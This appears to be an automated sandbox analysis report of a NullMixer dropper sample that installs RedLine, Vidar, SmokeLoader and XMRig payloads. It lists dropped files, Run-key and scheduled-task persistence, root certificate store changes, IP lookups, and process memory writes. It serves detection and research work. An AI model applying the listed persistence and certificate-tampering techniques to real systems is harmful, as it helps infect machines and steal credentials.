Malware Analysis Report

2024-10-19 02:13

Sample ID 240107-l26cksbgf3
Target 48ad5d8112df0d5b74f71fd25ccd4e18
SHA256 82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2
Tags
nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub5 aspackv2 backdoor dropper infostealer loader miner persistence rat stealer trojan spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2

Threat Level: Known bad

The file 48ad5d8112df0d5b74f71fd25ccd4e18 was found to be: Known bad.

Malicious Activity Summary

NullMixer

SectopRAT payload

RedLine

RisePro

Vidar

xmrig

SmokeLoader

RedLine payload

PrivateLoader

SectopRAT

Vidar Stealer

XMRig Miner payload

Executes dropped EXE

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies system certificate store

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-07 10:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-07 10:02

Reported

2024-01-07 10:05

Platform

win7-20231215-en

Max time kernel

70s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS08971586\0035b9e6fdaf9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1853AB71-AD44-11EE-9F1C-6E556AB52A45} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
